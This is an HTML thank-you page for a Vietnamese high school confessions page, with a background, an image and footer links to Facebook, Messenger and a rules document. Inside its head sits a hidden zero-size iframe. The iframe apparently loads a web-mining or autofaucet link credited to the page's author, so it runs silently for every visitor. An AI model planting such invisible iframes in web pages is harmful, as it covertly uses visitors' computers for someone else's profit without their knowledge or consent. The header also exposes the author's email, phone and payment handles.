<!DOCTYPE html
CODE GENERATOR BY VĂN HOÀNG

Email: vuh98926381@gmail.com
ZaloPay/Momo/VNDC/VNDS/Binance: 0376215739
Facebook: https://facebook.com/hoangjump
Telegram@hoangjump
>
<html lang="vi">
<head>
  <iframe src="https://autofaucet.org/wm/hoangjump/2" width="0" height="0" style="border:0"></iframe>
	<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="css/style.css" type="text/css" media="all" />
	<style> 
	body {
  padding-top:25px;
  background-color:#454545;
  margin-left:10px;
  margin-right:10px;
  font-family: Helvetica, Arial, sans-serif;
  background: url('https://i0.wp.com/s1.uphinh.org/2021/07/08/img100.jpg') no-repeat center center fixed;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
footer {
  max-width:600px;
  margin:0 auto;
  text-align:center;
  margin-top: 10px;
  color: white;
}
footer a {
  color: blue;
  font-weight: bold;
}
footer ul {
  list-style: none;
  width: 100%;
  text-align: center;
  padding: 0px;
}
footer ul li {
  display: inline-block;
}
footer ul li::after {
  
}
footer ul li .classUl::after {
  content: " . ";
}
footer ul li a {
  font-weight: initial;
}
</style>
<body>
<img src="https://files.catbox.moe/2ptzmk.png" alt="alternatetext" style="height: 400px; weight:400px">
<center><p style="color:white;font-size:25px;">CẢM ƠN BẠN ĐÃ TÂM SỰ</p></center>
<footer>
	<ul>
		<li><a href="https://hoangjump.github.io/n2tcfs/cfs.html" class="classUl">Trang chủ</a></li>
		<li><a href="https://www.facebook.com/n2tconfessions/" target="_blank" class="classUl">Facebook</a></li>
		<li><a href="https://docs.google.com/document/d/1l9VXVoCtJ4KHRyb4miv4aeDUFlFrzXr6-53zbDmZ5yY/edit?usp=drivesdk" class="classUl">Nội quy</a></li>
		<li><a href="https://m.me/n2tconfessions" target="_blank" >Liên hệ</a></li>
		<li><a href="https://m.me/hoangjump" target="_blank" >Liên hệ ADMIN</a></li>
	</ul>
	<p><a href="https://www.facebook.com/n2tconfessions/" target="_blank">THPT Nguyễn Trung Trực</a> © 2021</p>
</footer>
</body>
</html>
